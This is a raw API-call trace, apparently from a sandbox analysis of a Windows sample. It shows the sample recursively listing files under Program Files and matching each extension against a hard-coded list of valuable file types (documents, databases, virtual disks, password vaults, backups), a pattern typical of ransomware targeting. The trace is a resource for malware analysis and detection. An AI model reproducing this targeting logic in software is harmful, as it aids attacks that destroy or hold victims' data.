[0040.069] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US", pszFile="MSTTSLoc.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui" [0040.069] PathFindExtensionW (pszPath="MSTTSLoc.dll.mui") returned=".mui" [0040.069] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.069] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.070] FindNextFileW (in: hFindFile=0x54ae20, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 0 [0040.070] FindClose (in: hFindFile=0x54ae20 | out: hFindFile=0x54ae20) returned 1 [0040.070] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.070] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20", pszFile="MSTTSCommon.dll" | out: pszDest="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll" [0040.070] PathFindExtensionW (pszPath="MSTTSCommon.dll") returned=".dll" [0040.070] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.070] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.070] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.070] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20", pszFile="MSTTSEngine.dll" | out: pszDest="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll" [0040.070] PathFindExtensionW (pszPath="MSTTSEngine.dll") returned=".dll" [0040.070] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.070] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.070] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.070] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20", pszFile="MSTTSLoc.dll" | out: pszDest="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll" [0040.070] PathFindExtensionW (pszPath="MSTTSLoc.dll") returned=".dll" [0040.070] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.070] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.071] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.071] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.071] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0 [0040.071] FindClose (in: hFindFile=0x54ad60 | out: hFindFile=0x54ad60) returned 1 [0040.071] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 0 [0040.071] FindClose (in: hFindFile=0x54ad20 | out: hFindFile=0x54ad20) returned 1 [0040.071] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.071] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\Common Files", pszFile="System" | out: pszDest="C:\\Program Files\\Common Files\\System") returned="C:\\Program Files\\Common Files\\System" [0040.071] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\System") returned 0x0 [0040.071] PathCombineW (in: pszDest=0x2e4da50, pszDir="C:\\Program Files\\Common Files\\System", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\System\\*") returned="C:\\Program Files\\Common Files\\System\\*" [0040.071] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\*", lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 0x54ad20 [0040.076] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.077] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.077] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\Common Files\\System", pszFile="ado" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado") returned="C:\\Program Files\\Common Files\\System\\ado" [0040.077] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\System\\ado") returned 0x0 [0040.077] PathCombineW (in: pszDest=0x2e4d1c0, pszDir="C:\\Program Files\\Common Files\\System\\ado", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado\\*") returned="C:\\Program Files\\Common Files\\System\\ado\\*" [0040.077] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\ado\\*", lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0x54ad60 [0040.084] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.084] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.084] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\ado", pszFile="adojavas.inc" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" [0040.084] PathFindExtensionW (pszPath="adojavas.inc") returned=".inc" [0040.084] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".inc.") returned 5 [0040.084] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".inc.") returned 0x0 [0040.085] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.085] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\ado", pszFile="adovbs.inc" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" [0040.085] PathFindExtensionW (pszPath="adovbs.inc") returned=".inc" [0040.085] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".inc.") returned 5 [0040.085] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".inc.") returned 0x0 [0040.085] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.085] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\ado", pszFile="en-US" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado\\en-US") returned="C:\\Program Files\\Common Files\\System\\ado\\en-US" [0040.085] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\System\\ado\\en-US") returned 0x0 [0040.085] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\System\\ado\\en-US", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*") returned="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*" [0040.085] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.085] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.085] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.085] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\System\\ado\\en-US", pszFile="msader15.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" [0040.086] PathFindExtensionW (pszPath="msader15.dll.mui") returned=".mui" [0040.086] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.086] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.086] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.086] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.086] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.086] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\ado", pszFile="msader15.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" [0040.086] PathFindExtensionW (pszPath="msader15.dll") returned=".dll" [0040.086] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.086] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.086] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.086] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\ado", pszFile="msado15.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" [0040.086] PathFindExtensionW (pszPath="msado15.dll") returned=".dll" [0040.086] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.086] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.086] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.086] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\ado", pszFile="msado20.tlb" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" [0040.087] PathFindExtensionW (pszPath="msado20.tlb") returned=".tlb" [0040.087] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".tlb.") returned 5 [0040.087] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".tlb.") returned 0x0 [0040.087] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.087] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\ado", pszFile="msado21.tlb" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" [0040.087] PathFindExtensionW (pszPath="msado21.tlb") returned=".tlb" [0040.087] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".tlb.") returned 5 [0040.087] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".tlb.") returned 0x0 [0040.087] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.087] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\ado", pszFile="msado25.tlb" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" [0040.087] PathFindExtensionW (pszPath="msado25.tlb") returned=".tlb" [0040.087] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".tlb.") returned 5 [0040.087] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".tlb.") returned 0x0 [0040.087] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.087] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\ado", pszFile="msado26.tlb" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb") returned="C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" [0040.087] PathFindExtensionW (pszPath="msado26.tlb") returned=".tlb" [0040.087] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".tlb.") returned 5 [0040.087] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".tlb.") returned 0x0 [0040.088] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.088] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\ado", pszFile="msado27.tlb" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb") returned="C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" [0040.088] PathFindExtensionW (pszPath="msado27.tlb") returned=".tlb" [0040.088] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".tlb.") returned 5 [0040.088] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".tlb.") returned 0x0 [0040.088] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.088] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\ado", pszFile="msado28.tlb" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb") returned="C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" [0040.088] PathFindExtensionW (pszPath="msado28.tlb") returned=".tlb" [0040.088] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".tlb.") returned 5 [0040.088] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".tlb.") returned 0x0 [0040.088] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.088] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\ado", pszFile="msadomd.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll") returned="C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll" [0040.088] PathFindExtensionW (pszPath="msadomd.dll") returned=".dll" [0040.088] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.088] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.088] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.088] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\ado", pszFile="msadomd28.tlb" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb") returned="C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" [0040.088] PathFindExtensionW (pszPath="msadomd28.tlb") returned=".tlb" [0040.089] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".tlb.") returned 5 [0040.089] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".tlb.") returned 0x0 [0040.089] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.089] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\ado", pszFile="msador15.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado\\msador15.dll") returned="C:\\Program Files\\Common Files\\System\\ado\\msador15.dll" [0040.089] PathFindExtensionW (pszPath="msador15.dll") returned=".dll" [0040.089] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.089] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.089] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.089] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\ado", pszFile="msadox.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado\\msadox.dll") returned="C:\\Program Files\\Common Files\\System\\ado\\msadox.dll" [0040.089] PathFindExtensionW (pszPath="msadox.dll") returned=".dll" [0040.089] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.089] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.089] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.089] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\ado", pszFile="msadox28.tlb" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb") returned="C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" [0040.089] PathFindExtensionW (pszPath="msadox28.tlb") returned=".tlb" [0040.089] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".tlb.") returned 5 [0040.089] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".tlb.") returned 0x0 [0040.089] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.089] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\ado", pszFile="msadrh15.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll") returned="C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll" [0040.090] PathFindExtensionW (pszPath="msadrh15.dll") returned=".dll" [0040.090] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.090] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.090] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0 [0040.090] FindClose (in: hFindFile=0x54ad60 | out: hFindFile=0x54ad60) returned 1 [0040.090] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.090] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\Common Files\\System", pszFile="DirectDB.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\DirectDB.dll") returned="C:\\Program Files\\Common Files\\System\\DirectDB.dll" [0040.090] PathFindExtensionW (pszPath="DirectDB.dll") returned=".dll" [0040.090] wsprintfW (in: param_1=0x2e4dc58, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.090] StrStrIW 